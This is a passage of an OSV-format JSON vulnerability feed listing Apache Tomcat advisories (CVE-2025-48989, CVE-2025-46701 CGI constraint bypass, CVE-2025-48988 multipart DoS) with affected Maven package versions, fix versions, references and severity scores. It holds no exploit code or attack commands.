"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-gqp3-2cvr-x8m3/GHSA-gqp3-2cvr-x8m3.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.108" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.100", "9.0.102", "9.0.104", "9.0.105", "9.0.106", "9.0.107", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-gqp3-2cvr-x8m3/GHSA-gqp3-2cvr-x8m3.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.10" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", 
"11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-gqp3-2cvr-x8m3/GHSA-gqp3-2cvr-x8m3.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.44" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39", "10.1.4", "10.1.40", "10.1.41", "10.1.42", "10.1.43", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-gqp3-2cvr-x8m3/GHSA-gqp3-2cvr-x8m3.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.108" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", 
"9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.100", "9.0.102", "9.0.104", "9.0.105", "9.0.106", "9.0.107", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-gqp3-2cvr-x8m3/GHSA-gqp3-2cvr-x8m3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48989" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/73c04a10395774bda71a0b37802cf983662ce255" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/f362c8eb3b8ec5b7f312f7f5610731c0fb299a06" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/f36b8a4eea4ce8a0bc035079e1d259d29f5eb7bf" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/9ydfg0xr0tchmglcprhxgwhj0hfwxlyf" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-10.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-11.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html" }, { "type": 
"WEB", "url": "https://www.kb.cert.org/vuls/id/767506" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2025/08/13/2" } ], "database_specific": { "cwe_ids": [ "CWE-404" ], "github_reviewed": true, "github_reviewed_at": "2025-08-13T23:09:12Z", "nvd_published_at": "2025-08-13T13:15:34Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-h2fw-rfh5-95r3", "published": "2025-05-29T21:31:37Z", "modified": "2025-11-03T23:17:19.299895Z", "aliases": [ "BIT-tomcat-2025-46701", "CVE-2025-46701" ], "related": [ "CGA-m722-vhqr-x99v" ], "summary": "Apache Tomcat - CGI security constraint bypass", "details": "Improper Handling of Case Sensitivity vulnerability in Apache Tomcat's GCI servlet allows security constraint bypass of security constraints that apply to the pathInfo component of a URI mapped to the CGI servlet.\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.6, from 10.1.0-M1 through 10.1.40, from 9.0.0.M1 through 9.0.104. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 though 8.5.100. 
Other, older, EOL versions may also be affected.\n\nUsers are recommended to upgrade to version 11.0.7, 10.1.41 or 9.0.105, which fixes the issue.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.105" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.100", "9.0.102", "9.0.104", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-h2fw-rfh5-95r3/GHSA-h2fw-rfh5-95r3.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.41" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", 
"10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39", "10.1.4", "10.1.40", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-h2fw-rfh5-95r3/GHSA-h2fw-rfh5-95r3.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.7" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-h2fw-rfh5-95r3/GHSA-h2fw-rfh5-95r3.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.105" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", 
"9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.100", "9.0.102", "9.0.104", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-h2fw-rfh5-95r3/GHSA-h2fw-rfh5-95r3.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.41" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39", "10.1.4", "10.1.40", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-h2fw-rfh5-95r3/GHSA-h2fw-rfh5-95r3.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.7" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-h2fw-rfh5-95r3/GHSA-h2fw-rfh5-95r3.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.0", "8.5.100", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", 
"8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-h2fw-rfh5-95r3/GHSA-h2fw-rfh5-95r3.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.0", "8.5.100", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-h2fw-rfh5-95r3/GHSA-h2fw-rfh5-95r3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46701" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/0f01966eb60015d975525019e12a087f05ebf01a" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/238d2aa54b99f91d1111467e2237d2244c64e558" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/2c6800111e7d8d8d5403c07978ea9bff3db5a5a5" }, { 
"type": "WEB", "url": "https://github.com/apache/tomcat/commit/8cb95ff03221067c511b3fa66d4f745bc4b0a605" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/8df00018a252baa9497615d6420fb6c10466fa74" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/fab7247d2f0e3a29d5daef565f829f383e10e5e2" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/xhqqk9w5q45srcdqhogdk04lhdscv30j" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/07/msg00009.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-10.html#Fixed_in_Apache_Tomcat_10.1.41" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-11.html#Fixed_in_Apache_Tomcat_11.0.7" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.105" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2025/05/29/4" } ], "database_specific": { "cwe_ids": [ "CWE-178" ], "github_reviewed": true, "github_reviewed_at": "2025-05-29T22:37:21Z", "nvd_published_at": "2025-05-29T19:15:27Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:U/U:Clear" } ] }, { "schema_version": "1.7.3", "id": "GHSA-h3gc-qfqq-6h8f", "published": "2025-06-16T15:32:28Z", "modified": "2025-11-03T21:49:36.618679Z", "aliases": [ "BIT-tomcat-2025-48988", "CVE-2025-48988" ], "related": [ "CGA-76pw-gh2p-78vh" ], "summary": "Apache Tomcat - DoS in multipart upload", "details": "Allocation of Resources Without Limits or Throttling vulnerability in Apache Tomcat.\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.7, from 10.1.0-M1 through 10.1.41, from 9.0.0.M1 through 9.0.105. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 though 8.5.100. 
Other, older, EOL versions may also be affected.\n\nUsers are recommended to upgrade to version 11.0.8, 10.1.42 or 9.0.106, which fix the issue.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.8" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7" ], "database_specific": { "last_known_affected_version_range": "\u003c= 11.0.7", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-h3gc-qfqq-6h8f/GHSA-h3gc-qfqq-6h8f.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.42" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39", "10.1.4", "10.1.40", "10.1.41", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 10.1.41", "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-h3gc-qfqq-6h8f/GHSA-h3gc-qfqq-6h8f.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.106" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.100", "9.0.102", "9.0.104", "9.0.105", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.105", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-h3gc-qfqq-6h8f/GHSA-h3gc-qfqq-6h8f.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.8" } ] } ], 
"versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7" ], "database_specific": { "last_known_affected_version_range": "\u003c= 11.0.7", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-h3gc-qfqq-6h8f/GHSA-h3gc-qfqq-6h8f.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.42" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", 